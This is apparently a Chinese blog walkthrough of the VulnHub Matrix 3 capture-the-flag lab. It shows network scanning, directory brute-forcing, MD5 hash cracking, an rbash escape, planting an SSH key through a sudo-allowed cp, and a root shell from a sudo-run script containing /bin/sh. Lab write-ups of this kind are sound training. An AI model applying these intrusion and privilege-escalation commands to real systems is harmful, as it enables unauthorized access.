漏洞复现 -- MATRIX 3

于 2024-06-28 14:06:13 发布
阅读量131 收藏
点赞数 2
文章标签: 网络安全 安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80854251/article/details/140041926
版权

一、漏洞地址

https://www.vulnhub.com/entry/matrix-3,326/

二、漏洞复现

sudo arp-scan -l

nmap -p- 192.168.159.154 --min-rate=5000

http://192.168.159.154

dirb http://192.168.159.154

---------------------------------------

http://192.168.159.154/assets
http://192.168.159.154/index.html

http://192.168.159.154/assets

http://192.168.159.154/assets/img/Matrix_can-show-you-the-door.png

猜想matrix是一个目录访问试试
http://192.168.159.154/Matrix
在Matrix/n/e/o/6/4/目录下发现一个secret.gz文件,应该是一个提示

wgethttp://192.168.159.154/Matrix/n/e/o/6/4/secret.gz
cat secret.gz

得到用户名和密码: 
admin:76a2173be6393254e72ffa4d6df1030a
MD5解密
admin:passwd

http://192.168.159.154:7331/

使用kali下的dirb工具爆破目录及文件,发现assets、data目录

dirb http://192.168.159.154:7331/ -u admin:passwd -w

http://192.168.159.154:7331/data/
http://192.168.159.154:7331/assets/
http://192.168.159.154:7331/robots.txt/
http://192.168.159.154:7331/index.html/
wget http://192.168.159.154:7331/data/data --user=admin --password=passwd
查看data文件的文件类型,是一个Windows下的文件,但是在这里遇见了问题,没有找出data文件中隐藏的内容
使用IDA Pro反编译data文件找到了guest用户及密码

guest:7R1n17yN30

ssh guest@192.168.159.154 -p 6464

但是我们得到了受限制的 bash (rbash) shell,所以我们使用 –t 选项来运行带有 noprofile 扩展的 ssh,我们得到了来宾用户的完整 shell。
通过检查来宾用户的 sudo 权限,我们了解到该用户可以使用另一个用户三位一体的权限运行 /bin/cp。

ssh guest@192.168.1.104 –p6464 –t "bash --noprofile"
sudo -l

为了提升为更高权限的用户,我们所做的是创建了一个新的 ssh 密钥对,授予对 id_rsa.pub 文件的读写执行权限,以便我们能够将其复制到目标位置。

ssh-keygen
cd .ssh
chmod 777 id_rsa.pub

然后我们利用 sudo 权限将 id_rsa.pub 文件复制到 /home/trinity/.ssh/authorized_keys 文件夹中。现在,我们可以使用 id_rsa 密钥通过三位一体用户访问目标机器的 ssh。
检查三位一体的 sudo 权限,它可以使用 root 权限执行预言机文件。

cp id_rsa.pub /home/guest
cd ..
sudo -u trinity /bin/cp ./id_rsa.pub /home/trinity/.ssh/authorized_keys
ssh trinity@127.0.0.1 -i /.ssh/id_rsa -p 6464
sudo -l

但是 /home/trinity 目录中没有名为 oracle 的文件,因此我们使用 echo 命令创建了一个包含 /bin/sh 的 oracle 文件。最后,我们用 sudo 命令执行了 oracle 文件,我们得到了 root shell。

一旦你有了根 shell,你就可以很容易地得到标志。

echo "/bin/sh" > oracle
chmod 777 oracle
sudo ./oracle
id
ls
cat flag.txt

冷酷小帅~0x7e
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
react-native-color-matrix-image-filters:适用于iOS和Android的各种基于颜色矩阵的图像滤镜
02-05
React本机颜色矩阵图像过滤器 适用于iOS和...从npm安装最新版本$ npm i react-native-color-matrix-image-filters -S 2.安装吊舱$ cd ios && pod install && cd .. 带有React本机“ > = 0.56.0 <0.60.0 ” 1.从
matrix-react-sdk:适用于React Javascript的Matrix SDK
04-27
它和matrix-org/matrix-react-sdk应该有效地视为一个项目(例如,当前对vector-im / element-web提交了matrix-react-sdk错误,而不是该项目)。翻译状态开发人员指南平台目标: Chrome,Firefox和Safari。 WebRTC...
基于Matrix框架的漏洞渗透
真正的大师,永远都怀着一颗学徒的心。
08-22 2588
文章目录前言一、信息收集1.IP端口收集2.访问对方web页面3.访问原IP+31337端口4 进行base64解密5 文件的下载与brainf*ck的解密二、SSH账号登陆以及提权1. crunch和hydra的使用2.登陆SSH与提权总结 前言 Matrix 是一个基于 javaEE 技术集成的基础应用系统,是一个可以看见和运行的系统,matrix定义了一个稳定而有效的设计开发框架,结合代码生成器使用自动生成增删改查代码简化了应用开发过程。它集成了系统日志,事务控制、安全校验、权限管理等功能,为开发人
Vulnhub靶场之matrix-breakout-2-morpheus
qq_69775412的博客
10-17 606
简介: vulnhub是一个提供靶场环境的平台。今天从首页下载了一个来做,它叫matrix-breakout-2-morpheus。
Machine_Matrix1 渗透提权
猎荒者
12-15 425
前言 随笔一篇,用于记录,留下心得。 1.1 环境 ① 攻击机:Kali ② 靶机:Machine_Matrix 1.2 渗透实战 1.2.1 信息收集 ifconfig 查看攻击机 Kali IP,以确定待会要扫描的网段 ① 发现主机 命令:netdiscover -r 192.168.11.0/24 说明:192.168.11.136 是我另一台虚拟机的IP 由此可以得出 Machine_M...
【vulnhub靶场】MATRIX-BREAKOUT: 2 MORPHEUS
信安是不可或缺的一部分!
06-05 1306
这是《黑客帝国》系列的第二部,副标题是《沉睡魔咒:1》。它的主题是回到第一部《黑客帝国》。你扮演的角色是Trinity,试图调查尼布甲尼撒号上的一台电脑,Cypher把其他人都锁在了电脑之外,这台电脑拥有解开谜团的钥匙。使用apache漏洞利用:(失败)在目录爆破时已经注定失败。192.168.200.254为net网卡dhcp地址。192.168.200.2为net网卡网关。网段为:192.168.200.0/24。靶机地址:192.168.200.134。192.168.200.1为物理机地址。
D-Link service.cgi远程命令执行漏洞复现
weixin_30487701的博客
01-25 120
1.1 概述 友讯集团(D-Link),成立于1986年,1994年10月于台湾证券交易所挂牌上市,为台湾第一家上市的网络公司,以自创D-Link品牌行销全球,产品遍及100多个国家。 1月17日,CNVD公开了D-LinkDIR 615/645/815 service.cgi远程命令执行漏洞(CNVD-2018-01084)。由于笔者近期对网络设备进行渗透技术略有研究,便复现了一下该漏洞。 ...
靶机渗透:Matrix-Breakout: 2 Morpheus
最新发布
sev1n的博客
03-09 1934
Matrix-Breakout: 2 Morpheus靶机分享
Vulnhub靶机笔记2——matrix-breakout-2-morpheus
2301_76329510的博客
04-30 824
发现存在robot.txt、graffiti.txt和graffiti.php三个敏感文件。这是个很牛逼的工具,使用它的linpeas_base.sh进行漏洞扫描。80端口发现两个重要文件test.php和robots.txt。使用CVE-2022-0847 DirtyPipe漏洞。发现可以输入的东西可以写入graffiti.txt。提权成功,这种方法虽然快,但是显得太简单。检测到一个cve-2022-0847漏洞。发现存在CVE-2022-0847漏洞。访问graffiti.txt。
CVE-2018-0798:Microsoft office 公式编辑器 Matrix record 字段栈溢出漏洞调试分析
CuiXY's Blog
12-29 658
\x01 前言 2018 年 1 月 9 日,Office 公式编辑器再曝出新漏洞,编号为 CVE-2018-0798。提起公式编辑器大家都不陌生,之前的 CVE-2017-11882 和 CVE-2018-0802 这对姊妹漏洞都出自这里,当然了这个只是公开的漏洞,还有一些是没有公开的。可能是由于公式编辑器漏洞有点多,所以这次 Windows 干脆直接通过删掉公式编辑器的方式来修复漏洞,一了百...
CVE-2021-21972 vCenter 远程命令执行漏洞分析
爱国小白帽
02-25 6856
报告编号:B6-2021-022501 报告来源:360NoahLab 报告作者:Ricter 更新日期:2021-02-25 0x01漏洞简介 vSphere 是 VMware 推出的虚拟化平台套件,包含 ESXi、vCenter Server 等一系列的软件。其中 vCenter Server 为 ESXi 的控制中心,可从单一控制点统一管理数据中心的所有 vSphere 主机和虚拟机,使得 IT 管理员能够提高控制能力,简化入场任务,并降低 IT 环境的管理复杂性与成本。 vSphere Clien.
Matrix_Converter_3phase.rar_AC-AC_matrix converter
07-15
3 phase ac ac matrix converter
cuon-matrix.js
07-11
为WebGL提供一系列矩阵相关的API
前端开源库-ml-matrix
08-29
前端开源库-ml-matrix矩阵矩阵操作和计算库
rpi-rgb-led-matrix:使用Raspberry Pi GPIO控制多达三个链的64x64、32x32、16x32或类似的RGB LED显示器
02-05
在Raspberry Pi 2或3上,您可以轻松地在该链中链接12块面板(因此总共36块面板),但是理论上您可以将其拉伸到多达96块面板(链长为32),并且仍然可以达到100Hz左右的刷新率。完整的24位彩色(理论上-从未测试过此...
docker-matrix:Matrix是开发人员的一致开发环境
05-10
Matrix是面向开发人员的开发堆栈环境 想要贡献吗? 查看并解决您感兴趣的问题! 介绍 无论何时更换计算机,或者只是在多台计算机上工作或跨不同的操作系统,Matrix都会提供一致的开发环境。 用法 docker pull ...
polynomial space-time covariance matrix
05-09
A polynomial space-time covariance matrix is a matrix that describes the covariance between different space-time points in a polynomial regression model. In other words, it is a matrix that describes ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值